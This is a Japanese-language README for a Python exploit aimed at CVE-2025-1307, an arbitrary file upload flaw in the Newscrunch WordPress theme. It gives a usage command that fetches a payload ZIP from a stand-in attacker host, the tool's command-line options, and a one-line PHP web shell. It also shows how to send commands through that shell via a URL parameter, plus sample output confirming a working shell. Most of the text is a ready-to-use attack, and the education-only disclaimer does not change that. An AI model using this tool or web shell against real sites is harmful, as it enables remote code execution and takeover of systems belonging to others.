
Newscrunch <= 1.8.4 - 認証済み(購読者+)任意のファイルアップロード
このエクスプロイトは、Newscrunch WordPress テーマの深刻な脆弱性 (CVE-2025-1307) を標的とします。この欠陥は、newscrunch_install_and_activate_plugin() 関数における権限チェックの欠落により、認証済みユーザー(Subscriber 以上) が任意のファイルをアップロードできるようにします。これにより、リモートコード実行 (RCE) が可能になり、影響を受ける WordPress サイトが完全に侵害される可能性があります。
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H悪用可能性: を持つ有効な WordPress アカウントが必要です。
✅ CVE-2025-1307 の自動悪用
✅ 脆弱なテーマバージョンの自動検出
✅ ZIP ペイロードの自動展開と実行
✅ ZIP からシェルファイル名を動的に取得
✅ 悪用後のシェル利用可否の自動確認
✅ デバッグ用の明快で構造化されたログ出力
Python 3.x がインストールされていることを確認し、必要な依存関係をインストールしてください:
pip install requests urllib3 packaging
python CVE-2025-1307.py -u "http://target" -un "admin" -p "password" -pl "http://attacker.com/malicious.zip"
Exploit for CVE-2025-1307 in WordPress Newscrunch Theme By Nxploit | Khaled Alenazi
options:
-h, --help show this help message and exit
-u URL, --url URL Target WordPress URL (e.g., https://example.com)
-un USERNAME, --username USERNAME
WordPress username
-p PASSWORD, --password PASSWORD
WordPress password
-pl PAYLOAD_URL, --payload_url PAYLOAD_URL
Malicious file URL to upload
シェルが正常にアップロードされると、ターゲットシステム上でリモートコマンド実行が可能になります。シェルファイルは ZIP アーカイブ内に配置する必要があり、悪用時に自動的に展開されます。
PHP シェル (shell.php) が ZIP アーカイブ内にあることを確認してください。次に、エクスプロイトを使用して ZIP ファイルをアップロードします。
<?php system($_GET['cmd']); ?>
シェルの URL に cmd パラメータを追加することで、ブラウザ経由でシステムコマンドを実行できます:
http://target/wp-content/plugins/shell.php?cmd=whoami
[+] Newscrunch theme version detected: 1.8.4
[+] Exploitation is possible, proceeding...
[*] Logging in...
[+] Logged in successfully.
[*] Uploading and extracting payload...
[+] Exploit executed successfully. Malicious file uploaded.
[*] Checking if shell is accessible: http://target/wp-content/plugins/U.php
[+] Shell successfully uploaded and accessible: http://target/wp-content/plugins/U.php?cmd=ls
このツールは教育およびセキュリティ研究目的のみで提供されます。脆弱性の無断悪用は違法であり、法律によって罰せられます。作者は、このツールの誤用またはこのツールによって引き起こされた損害について一切の責任を負いません。責任を持って使用してください。
作者: Nxploit | Khaled Alenazi